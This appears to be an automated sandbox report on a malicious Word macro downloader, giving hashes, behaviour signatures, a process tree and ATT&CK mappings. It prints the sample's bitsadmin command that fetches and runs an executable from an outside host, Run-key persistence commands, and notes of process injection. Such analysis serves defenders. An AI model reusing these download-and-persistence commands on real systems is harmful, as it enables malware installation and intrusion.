61c7eb8c33d7eb01285c503fa72d249f470fe3606ff10e459cfdc2f9e3d59b35

General

Target

SecuriteInfo.com.W97M.Downloader.3758.22468.doc
Size

39KB
MD5

205b4d4b93e744d9ae520b62e98c7619
SHA1

688752c9a25d28e3533cc98b37d98bc688614207
SHA256

61c7eb8c33d7eb01285c503fa72d249f470fe3606ff10e459cfdc2f9e3d59b35
SHA512

40d3d3a4b4b8944ec6546888bd1599945c5b558c7edcc24cdd0dc30f9331b1396d68e34eb5a43f5c38e60b24ad97b67c065722c1b462d4971f5b1e7e7143038c

Score

10^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

filename.exesystemapp.exe

pid process

1792 filename.exe
1792 filename.exe
1792 filename.exe
1792 filename.exe
2036 systemapp.exe
2036 systemapp.exe
2036 systemapp.exe
Loads dropped DLL 2 IoCs

Processes:

filename.exesystemapp.exe

pid process

1792 filename.exe
2036 systemapp.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

systemapp.exe

description pid process target process

PID 2036 set thread context of 620 2036 systemapp.exe InstallUtil.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1432 bitsadmin.exe

pid	process
1792	filename.exe
1792	filename.exe
1792	filename.exe
1792	filename.exe
2036	systemapp.exe
2036	systemapp.exe
2036	systemapp.exe

pid	process
1792	filename.exe
2036	systemapp.exe

description	pid	process	target process
PID 2036 set thread context of 620	2036	systemapp.exe	InstallUtil.exe

pid	process
1432	bitsadmin.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

WINWORD.EXEfilename.execmd.exesystemapp.execmd.exe

description	pid	process	target process
PID 1060 wrote to memory of 1432	1060	WINWORD.EXE	bitsadmin.exe
PID 1060 wrote to memory of 1432	1060	WINWORD.EXE	bitsadmin.exe
PID 1060 wrote to memory of 1432	1060	WINWORD.EXE	bitsadmin.exe
PID 1060 wrote to memory of 1792	1060	WINWORD.EXE	filename.exe
PID 1060 wrote to memory of 1792	1060	WINWORD.EXE	filename.exe
PID 1060 wrote to memory of 1792	1060	WINWORD.EXE	filename.exe
PID 1060 wrote to memory of 1792	1060	WINWORD.EXE	filename.exe
PID 1792 wrote to memory of 1652	1792	filename.exe	WINWORD.EXE
PID 1792 wrote to memory of 1652	1792	filename.exe	WINWORD.EXE
PID 1792 wrote to memory of 1652	1792	filename.exe	WINWORD.EXE
PID 1792 wrote to memory of 1652	1792	filename.exe	WINWORD.EXE
PID 1792 wrote to memory of 1576	1792	filename.exe	cmd.exe
PID 1792 wrote to memory of 1576	1792	filename.exe	cmd.exe
PID 1792 wrote to memory of 1576	1792	filename.exe	cmd.exe
PID 1792 wrote to memory of 1576	1792	filename.exe	cmd.exe
PID 1576 wrote to memory of 1860	1576	cmd.exe	reg.exe
PID 1576 wrote to memory of 1860	1576	cmd.exe	reg.exe
PID 1576 wrote to memory of 1860	1576	cmd.exe	reg.exe
PID 1576 wrote to memory of 1860	1576	cmd.exe	reg.exe
PID 1792 wrote to memory of 2036	1792	filename.exe	systemapp.exe
PID 1792 wrote to memory of 2036	1792	filename.exe	systemapp.exe
PID 1792 wrote to memory of 2036	1792	filename.exe	systemapp.exe
PID 1792 wrote to memory of 2036	1792	filename.exe	systemapp.exe
PID 2036 wrote to memory of 520	2036	systemapp.exe	cmd.exe
PID 2036 wrote to memory of 520	2036	systemapp.exe	cmd.exe
PID 2036 wrote to memory of 520	2036	systemapp.exe	cmd.exe
PID 2036 wrote to memory of 520	2036	systemapp.exe	cmd.exe
PID 520 wrote to memory of 576	520	cmd.exe	reg.exe
PID 520 wrote to memory of 576	520	cmd.exe	reg.exe
PID 520 wrote to memory of 576	520	cmd.exe	reg.exe
PID 520 wrote to memory of 576	520	cmd.exe	reg.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe
PID 2036 wrote to memory of 620	2036	systemapp.exe	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

filename.exesystemapp.exe

description pid process

Token: SeDebugPrivilege 1792 filename.exe
Token: SeDebugPrivilege 2036 systemapp.exe

description	pid	process
Token: SeDebugPrivilege	1792	filename.exe
Token: SeDebugPrivilege	2036	systemapp.exe

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

bitsadmin.exefilename.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1432	1060	bitsadmin.exe	WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1792	1060	filename.exe	WINWORD.EXE

Executes dropped EXE 2 IoCs

Processes:

systemapp.exeInstallUtil.exe

pid process

2036 systemapp.exe
620 InstallUtil.exe

pid	process
2036	systemapp.exe
620	InstallUtil.exe

Drops file in System32 directory 5 IoCs

Processes:

filename.exeWINWORD.EXEsystemapp.exe

description	ioc	process
File created	C:\Windows\SysWOW64\APPFORM FORM.docx	filename.exe
File opened for modification	C:\Windows\system32\APPFORM FORM.docx	WINWORD.EXE
File opened for modification	C:\Windows\SysWOW64\systemapp.exe	filename.exe
File created	C:\Windows\SysWOW64\systemapp.exe	filename.exe
File opened for modification	C:\Windows\SysWOW64\APPFORM FORM.docx	systemapp.exe

Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1060 WINWORD.EXE
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

WINWORD.EXE

pid process

1060 WINWORD.EXE
1060 WINWORD.EXE
1060 WINWORD.EXE

pid	process
1060	WINWORD.EXE

pid	process
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W97M.Downloader.3758.22468.doc"
1⤵
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1060

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer myFile /download /priority normal http://entrega-vertices.com/10G1B.exe C:\Users\Admin\AppData\Local\Temp\filename.exe
2⤵
- Download via BitsAdmin
- Process spawned unexpected child process
PID:1432

C:\Users\Admin\AppData\Local\Temp\filename.exe
C:\Users\Admin\AppData\Local\Temp\filename.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Drops file in System32 directory
PID:1792

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Windows\system32\APPFORM FORM.docx"
3⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\SysWOW64\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"
4⤵
PID:1860

C:\Windows\SysWOW64\systemapp.exe
"C:\Windows\system32\systemapp.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
- Drops file in System32 directory
PID:2036

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\SysWOW64\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"
5⤵
PID:576

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
4⤵
- Executes dropped EXE
PID:620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

Download Submit
C:\Users\Admin\Documents\APPFORM FORM.txt

Download Submit
C:\Windows\SysWOW64\APPFORM FORM.docx

Download Submit
C:\Windows\SysWOW64\systemapp.exe

Download Submit
C:\Windows\SysWOW64\systemapp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\InstallUtil.exe

Download Submit
\Windows\SysWOW64\systemapp.exe

Download Submit
memory/520-24-0x0000000000000000-mapping.dmp

Download
memory/576-25-0x0000000000000000-mapping.dmp

Download
memory/620-29-0x000000000040CA6E-mapping.dmp

Download
memory/620-28-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1060-8-0x0000000008CE0000-0x0000000008CE4000-memory.dmp

Filesize
16KB

Download
memory/1060-10-0x0000000008CE0000-0x0000000008CE4000-memory.dmp

Filesize
16KB

Download
memory/1060-9-0x0000000008CE0000-0x0000000008CE4000-memory.dmp

Filesize
16KB

Download
memory/1432-2-0x0000000000000000-mapping.dmp

Download
memory/1576-11-0x0000000000000000-mapping.dmp

Download
memory/1652-7-0x0000000000000000-mapping.dmp

Download
memory/1792-5-0x0000000000000000-0x0000000000000000-disk.dmp

Download
memory/1792-3-0x0000000000000000-mapping.dmp

Download
memory/1860-12-0x0000000000000000-mapping.dmp

Download
memory/2036-16-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads